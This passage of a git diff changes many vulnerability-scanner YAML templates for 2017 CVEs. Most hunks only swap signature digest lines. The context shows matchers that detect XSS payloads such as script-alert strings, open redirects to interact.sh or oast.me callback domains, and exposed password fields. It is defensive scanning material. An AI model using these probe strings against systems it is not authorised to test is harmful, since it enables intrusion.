4a0a004730450220388fc06798096814555fe2d037a116f31fea71904255e6eb5bb129dc26850ce5022100e9c47dfc17b4f2fa0ac83276ca066ba403d40504d183e26868ff7d8d537a5b17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204acf66b2e9668894bf04960a1ad8c1910f99e7fde7cabcf3fafb7fa60a484fb30220024dd231b8fb4cc04ff2d3546792bee45de5bf02de0f6395d797efd90b3a9906:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 55d59ea064d..01d5d698ad8 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4a0a00473045022100d53d17df42af7963542311ad827c19192084ca530fce89abdc17c0c960b63bd0022027cab7c83149a623703e9a38e2546803e895e5dc02254b4bb94e8a5129950e8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202134c9ec52fdf9bc224e7b33957ea4aab008ab110b128388543c254bdb749e7f0220035d689afcec9f6685969ef457ab42eb151b4a3b9dbf08ed0c2b610b96207e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index f786882239b..e8440ed2a85 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -45,4 +45,4 @@ http: part: header words: - 'Mogwailabs: CHECKCHECK' -# digest: 490a00463044022027400a98ba662dddc84876da4d0931235267b99728d2f91f8e054dd12ce3243b022045dc10664c7e3889e6300f703521856b106f6a2198bf520a59bacec70167112c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e33567120c21c6f47477be893f5c6b2f7f4cfb62a9676b0a2a740f9e2bf04f72022100e970b063fa821484edd07fb0ee4b91c26db690af67be580f5c6f8e4d1110c6ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 539d1694960..fde2ac0a805 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fc4c454028dcbaace8b14337660259563c87a34faa52156a3840a6ecf65646a3022100a7bd8597b77e48d8e0c09ea945e1ed99743e7b0c8ab537122b26aaa707edd5d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea2b72d2fb93af26f330b94184614e3efe34d5c58fe69e59bc52715e5e938d65022100e5e8df69fa6479280c9c9b90df762300c65c0d7a6160a332d49d8bebc6c08727:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11107.yaml b/http/cves/2017/CVE-2017-11107.yaml index ee40c10e061..f754ee7d843 100644 --- a/http/cves/2017/CVE-2017-11107.yaml +++ b/http/cves/2017/CVE-2017-11107.yaml @@ -55,4 +55,4 @@ http: - 'status_code == 200' - 'contains_all(body, "<script>alert(document.domain)</script>", "Entry Chooser")' condition: and -# digest: 4a0a00473045022100838849d1d18c1251b3a0aa78fca4c93e882c9c5625610eecfd88ea0e957b1bfb022037c0edd3b40c1f18205e7fe6d6ce7a5b59fea9c46426b956bd5cf946f9769dc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220500c577f6402c934660266c8bee58f628d806a142abc6b1ef252b948fa16c47602207a29986712d498d29307334463a1528e920cf4b564523a474d94a82a3f79e9bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 5ee44835578..f33cae38a75 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ccc438b8dd86913e1cd05d0ea8b48d6190bae22cb832023c13a181ea629a3fb4022031869eaad78f3a5aa658c8330896bf09b007f9125cbc16107152ced259f4ad16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cee80204f89a874435896d04a4ba3103cd536eb7045fe1d20faed61bf4ac385c022100ad6098a37f0e6c63df7ba77fef299688e8bd9a942d867fdeefb66fc2200683f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index b39dd0d5570..4558cfa1460 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008f51273aea01480aa78842a1b5af495f3f5441ae0d5900e3422e16fa407c4d21022100d1b1a3bbba01c60c6643e7abc68d7cd856da100e894b80a790f3a83f430de326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a26098e259496725d553ee8aebedd981485a4869c99b3af19a1c624f7dfa334022100cddf9a055d9dadf2b6ad91397b2f7025739a6847b322754765ec2ab9f4b0d4b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index 3ff2c27ef5e..99af4ecf5fa 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -45,4 +45,4 @@ http: part: header regex: - 'Refresh:(.*)url=http:\/\/interact\.sh' -# digest: 4a0a00473045022100e6ad31643be836fb6158117aeef207ebb8c4fc4a88e7c996c3e5aff163adcfc302201d2f5d1e11f53ffb84c3ca02a0bf5feb700d063518e0040a9ca8b8094ea7c145:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201281c94a0159bde135e408ff96f859c5e52444ff22290bdee951908dc426ec58022100c5592755ed93e7848ba78251e129c3bb72f65cdd1a05eea777206e8ff07e2509:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index d6cd07e2e76..d6bc80178fa 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204e6330cec5c2573663c1da743f518108daa533efbb6e15000aaf1511143b8f4c022100bc73eb12e35f5bbeec14630383a32dccddd74b916351c9ff93f0ed5d840ed67b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9f3ac3b0f5a047c105c3b346bb45ba4f7c6244d1d6b7f6374c98386bfdadaa0022100a75375f463dad7db82b2e9e67011832f9858bc05262d1e3b94960ee11749c881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 56daad6de54..69f144ed40e 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -46,4 +46,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100f5a22f8bcf1a51a1be4925c631e57ef6b4afa4d1cc09d069d2bd6f3a46748ef9022100a831ffb5cfe931617f0418b0476e7e765f3e4858a8b562b9d886686d881713a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0d3b5e6eeccb687a8025b53052ed9352814e6da59cc67d805004fa82be999930220104e77053849e9665ece8c4e56c831aa0f73e7a43f9af745b4aafdd621d0b367:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index ad397c1e767..17a4d977392 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220593e78f5845ccf701ee86f98f355414c94c11df126e2d80708dd8f3718a2620d022100a8ad648ea2385f09e68ac001dce324cbce6a5accc038821a70ac2a26e3aba47f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c7d184ebd66a3289ac31bdee353881aca8b5dff8fecc24d15f7059681f2083602203e6da32d7fed39dcfc92b28b6effef404596247d98b27e928bf4f15439820750:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index c06b3eb26c9..55a877df63d 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d205600dc2a5f66af64ad696e12afc6790996a4643cb8ab510592b168c9b0a7c02203229fec472377d1e2f7b74d061d306f0de4a9732314e33fafc29ee94d178467f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb4221198bf51c55e97596b04b6f4518a036e0468fae2aa3659e88661af3914102200c3b7a60c10bb92e572b0d62ffeed6289a789921507b18a0bdbf32ef72796b14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 376d5d90ad4..c78c0e2888e 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b2db3b3a256b35027795a489c488e6abe15ca185d6d551c084b2873462c495580220271eceb3d731f39cdae6417073285a82f646df3a5884949bd1f0af09a69a6027:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203f2b07af65bd0f4589d39c8c454ea5721609c79d731cc812a8e151a762dd5d16022100936addfdb3e5b1598ff563793fdea4693c9cf742122e7646f99b31e0302db1bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index b7aa3df54d8..50f972d9ce2 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207e774846b8af1996414fd4c1e67e69c297c60d00dcaec78f9ceca8e1912141e1022100b0e0ebadf5f785411af3646400b955f9f25c73baccd8c64ae6b4a5f21f89ca8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220331a40bb7753e8f611b7badd2601ba95466da64a9957343cc14c35ca75b217580220447c1852341f69cb6f0fa74bb4e8082979d9f26d7fa4d0ad9acff58154c041da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index bada6957704..76ee98dca3c 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206f93bc641c82b1f68b7a58c611da61648d8a4506f070287f14e61072844a6683022100860a31c069f438f392ee5bf49f6ff1e566e97a0feb9555db347a86f182b7ff1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a84921c618a5c27928cf8b5b4f62815835e1f9afde7c92a752cad583523b96f022100da0f5a76ef015915c8f613d9109e2b9ccb887e5e6236883603b5c17d290d0e41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index ae66a70e270..3e134f0484b 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# digest: 490a0046304402207a401e523c437e4d3f701bf087da0e9e1ee12fa663b0d7dd9a41f513ab77ddec0220513f3fd3ef25612737f5ea27e059e317dbd5b3eef425378fc237743e0769c373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b22f95a6d4a491818060d197a078f4c1c54ab5b2125522b0d8741e27ca255d602200851db73e2d09509b90c248fbe058a9edb2c5133c9aaf76d27d1515af5494023:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index fad5c8daa99..9db7be6bd24 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "<script>alert(document.domain)</script>")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# digest: 4b0a00483046022100a0583cf1c82a3e8bb8c58853377bb6ac194aa8250abdb2e6672e65e09a1c4daa0221008ffe11a3cf1056593985164005d2479d668c4331f7e83152e787e993708e88d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b562694911ae8e2c0b039618d0f42004daa6f9e6dcbc2a61334aa90170de6b92022100c3b878aa8187292faaa37ba93307fef5fb263ea589add7c832e62e215897649b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 1682e679b3e..7144dae3aa6 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -50,4 +50,4 @@ http: part: header words: - "text/html" -# digest: 490a0046304402204a059feedc921e7ea62be4b84b2682d303b8648484b92cfb2eaed1c20d52d06e02205540920fe54d52cd30220dc02c7f47ad773a6f09a4e316eb1cd003457803cd98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078d25c15db8dc3e3bd52dfcb72f18bbf9735c9358dc0da8f6cd486f55fc197eb0221008f685f978b6301ffa647fb8dddb988a44f22390fd405a75ff9a4879828c5531c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14725.yaml b/http/cves/2017/CVE-2017-14725.yaml index bd4b9d2d33a..657b7104db3 100644 --- a/http/cves/2017/CVE-2017-14725.yaml +++ b/http/cves/2017/CVE-2017-14725.yaml @@ -103,4 +103,4 @@ http: - contains(body, "href=\"https://oast.pro\"") - contains(body, "Back to Categories") condition: and -# digest: 4a0a00473045022052ecfc7bbf4dd5c1dfb83e65d0cdf78fee4d8b19ac6a8392bdf9859cc568914502210097e617d19ca4a6a096fe610460a58dcc8d64bfd17dd3619dffb091b95b9452f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c1bfb4c15b66169f7c71aa816c33f38fd8c70095c2a2cfa9fabf8873931ebf2022100f9ef1d0632dbb6e77480701a00eb92327a2bea76c4c2f3cf53cd477dff616ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14942.yaml b/http/cves/2017/CVE-2017-14942.yaml index 1d2a67fd5b4..3e75207f8c9 100644 --- a/http/cves/2017/CVE-2017-14942.yaml +++ b/http/cves/2017/CVE-2017-14942.yaml @@ -44,4 +44,4 @@ http: - "contains_all(body, 'wl_', '_passwd')" - "status_code==200" condition: and -# digest: 490a0046304402201a428a68496d7c78b3e9cfda0a24f460a638d0abb996e39dad218ec1f9424df70220548f4ea363e9da776cb57a009b3fdafa72dee16827eb775068da75e4b9604884:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ab402f48cc7ad6d52364aae3f5053b5cf19ac7d07c31e9b0ce491b3e01343c102206266f9d4d79f780779b7b5f166b9f3b7efca69516d82f3c286ad53e3c8a508d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index a16076ae70f..a83830c882a 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -41,4 +41,4 @@ http: - type: word words: - 'Unknown command: <script>alert(document.cookie)</script>' -# digest: 4a0a00473045022100c99198a8f8860ca69379f0e84e92f70411093f4aaf339c352d3d325e428a825302206dbd5cc09892384d4c8940ff961f48f48b9f0fe55c6c26d0cedd1b37eae5ca26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220367815b4fa07c5a5e7c583f08833266dee9557f696022806aa48ef7b2ed17fa602206b30473bd3fed6b3ac38a3176d530d0d8d30602229a27f786c4641805048a12f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index cc5b8fc64b5..a897272a9a0 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a02f21ae424dc936d6566ced1eb6b99c35bdd213ac82c0bc3cfba0794ae89f1c022061e7d6b1f278b061301f705688ffc554d28257958aedeccfd07f300a63e081b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a4f160dd5b18b00e94cafa57d112ab30a254363d4a4f056981caa71e183564a2022100e05cd2618101f27d45130964218ea30acfff053ec8a0c749c872b1080947e04a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 9195ea4839a..3faf393ab69 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -59,4 +59,4 @@ http: - type: dsl dsl: - 'contains(body_2, "{{randstr_1}}")' -# digest: 4a0a0047304502206522bf031a2578620375a1b59d29b9d528256d60195f27e16b5b905a4dc9b7dd022100fa464ee8f8b2e5603b14f99569e05c6c007e137e08fc91d723111931d4f5eb2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f929007ae50ec306f6baf9e1394bf7959fc62893586c0e9e72e295956ebc2d7022100dcd7ff4104a4270012a4546e173e65fc4e33927e2a5bcce31734ac3117ac3dcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 87d6c4326d5..56efad6c8d5 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec1edb5fe13b849ddec039e37619fdebb972e2b97e98c716ccedcbfe7c3cdd2c022100f7176db293113458ad83ef636886c6fdf428e4d4be9761b3a193162eccd9266e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074025f6108d4c89cd432e37d054b3436272e63880a0aea532e320d5a955521db02202fd527782b0b1c88ee1dddac6af86d2ab69f6c3a1b80e3578a048ee371e7c8e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17092.yaml b/http/cves/2017/CVE-2017-17092.yaml index 2406cea5d6c..fb9b22cd98f 100644 --- a/http/cves/2017/CVE-2017-17092.yaml +++ b/http/cves/2017/CVE-2017-17092.yaml @@ -136,4 +136,4 @@ http: - status_code == 200 - contains(body, "//{{marker}}") condition: and -# digest: 4a0a00473045022100b8439c218131028527992d1dda641a9a57d924da4e8b844bcd440d72a299a7bc02204fecc3d6b5558b8dad3d6759253be925f5ce5f6137b9a41ccabeb669a7c89e1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b1cd13374dd32fee0aa15c326fc755b68ce0fb0d5a28d4ab4039e4f96cce6a4f022100856788d87d612c4934020b6ab453111ade664070a6d1ffe48cbb4a24fef19895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index e0eced94c47..f19dce442e6 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100edb6a5792d965e90d575ec87b0c57da69ff67f47c4ceb1a5f1e4bae2200cf23502200d12931fa86837463f9d6fd2b985c1078da5f83baccee5d59229e343c22a8b01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c1660be3366e72bc3f23432ac9b4e03a20b496394acc29af3b99d61b8ca2a240220738b5a99950ac00c6465030a70e3136d92812e1ddde8f8000c04b8b944978fc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17762.yaml b/http/cves/2017/CVE-2017-17762.yaml index aad69cb865a..2fefb5b57c3 100644 --- a/http/cves/2017/CVE-2017-17762.yaml +++ b/http/cves/2017/CVE-2017-17762.yaml @@ -75,4 +75,4 @@ http: - "contains(interactsh_protocol,'dns')" - 'status_code == 200 || status_code == 500' condition: and -# digest: 490a00463044022027e033ca5867b376ee4ca50d02ae06b55dc42467b55927f0fe965ff2d0b4d97a0220529f4b33d4ccd7fcae7165ec5d8f6925aa29c92e7e64f54d29b4688f7929e1b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d27e4c10c9a1e750fc161b592e498827c746a7f3cf8a013e87a2b8bcbf6bde4e022100b5b776c6ff9592e48292d45b0ba5bc3adc4dcea98dde58e1900eee218758509b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index a458e0e4413..90397bc08b3 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f3fdc1e1aff6f3d3dfdfdee8ca399552c37218da74b77fa5964563a34ceba135022100e6405312b9645507194f58391a8985dd015bcf7832dbc5cb65ab228f9f69c917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e91b7e4d9dbfe9d2aa61d359bbe4714009f7d3f64c38117b41563d854cba2cb8022031d3f21252614c19914e86ae997ca5646be6785a4f9152209ba84224fed8fed2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18349.yaml b/http/cves/2017/CVE-2017-18349.yaml index 579354cfecb..62840315891 100644 --- a/http/cves/2017/CVE-2017-18349.yaml +++ b/http/cves/2017/CVE-2017-18349.yaml @@ -166,4 +166,4 @@ http: - type: kval kval: - interactsh_ip -# digest: 4a0a00473045022100998ec3949522af61b540e5a2d0d9609e6f5d6cc6f45e506c1e2a8926a8602c92022054179212d5b5e2c0658124fc6a1e596121ff2ca3dd608f0e310361df35f43538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066c4f67384b01762ab72a9833a5b16481057a04c13f7b12fe67dcafdbdc0ed23022061d93ae1972ee300e2b443d98b6a64b2aa9aa30f71089bd1420e18ce2b27a521:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18362.yaml b/http/cves/2017/CVE-2017-18362.yaml index d213003e2ac..bfc21227086 100644 --- a/http/cves/2017/CVE-2017-18362.yaml +++ b/http/cves/2017/CVE-2017-18362.yaml @@ -39,4 +39,4 @@ http: - contains_any(body, 'ManagedIT.asmx?op=', 'ExecuteSQLQuery') - status_code == 200 condition: and -# digest: 4a0a0047304502203e320c1df9b6cd53e48de6b854e9487acf56ab971069094abc568527e5bb523d022100a40568ab1abdf1c517991be2f051314074e37a0d7e2096e6b436ac15e14a9403:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022037102166f66f80c0501d411f18c9f5622d48cbcbef3dc772c219d0b42a8109cc022100b83783496433bcf56f3bbe2e95848f643cd0c8702d0015c4b453791e62575322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index 8e59cd1d082..f63c33f9987 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google AdSense")' condition: and -# digest: 4a0a00473045022100bac6d3dae01670f631dc2405b4e112d6bcb39a63326321b20de59c756c031baf022006d6f31aed4bb8b1413b511ce58bd0851143726e998dae03e048db7c3c1540e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a41580b742313281cd9525cd253a697d61ffd5e150da4ca335157e6063164dc022100c0bea6c589712398147f652c96d03b75459114df38c519a74d756ee027425bd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index 686cfd0c1e0..37e46d17bb9 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 4b0a0048304602210080917beaf9177b30a275459cd8c1eb83d6810860aa9c49837f343fe25edb8f52022100e4d41980da15d189eeeb61655a0bfcf18a0b745e8555af4f1d941e7c0dc92173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008048dca0d68910618e02b3eb7a0e96631f9abb64bf71651f83434f0ac52d7366022100ad92ad1e03a4d078e9f4ee16a6a138a1d21dc80fd687dae9ca559f61a33774b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 8cedd28a38c..530b8862582 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form by")' condition: and -# digest: 4a0a00473045022015ac3271315564930fceabf80cac5e92108c770f5ddc6d4fe49514a0388d89b5022100fdd3e2aba5101b1fce5513f5ad021c4692bef9a4537e64e1926be066fc9df072:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203dcaa72d5ab89d370f9dd6136818d9ff1e018fcdab6dd1ccc8644a088133a0e80220269c14182282c3a2ede76bf4c7fd7ae44276f10d3439da417093216738c3ef7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index dfe8ad4e8ea..65f48a44c6c 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 490a0046304402200e13092b55b739720335d54f72dc41e1e6f1b59d9e9740c49fc23c17a37ba8340220229a712402c5392e36555a1e1f9290c49defc0e3697e482e0d96459de8ba5b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b9346dcb76e7329cb5087f6e3886968cb0878682a8f7c623e21facd08a71b79022100d06b18ed12d7245eb2a3194c2ef692c9c123312bbb463193fc5664e877b47096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 092b0ab2973..9b3cf8272f3 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 4b0a00483046022100ddeb2281008d0b1916af9db7140cdb602b52d9f6c6654c676f7d8ddbc31904c3022100fcc92272603c656a04f5026c161d8b3e28cc8afbb162c1e487ee8928c3a92bb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5892f26fd08a2ea8ee989cdc433268c94742c773a745a3e470d9ac7081abd1c0221009b54d133c120c0f2439be3233ce33198506f5033e68b46282fb63396f21c5feb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 3e735cbc176..b247e8cf2c6 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -57,4 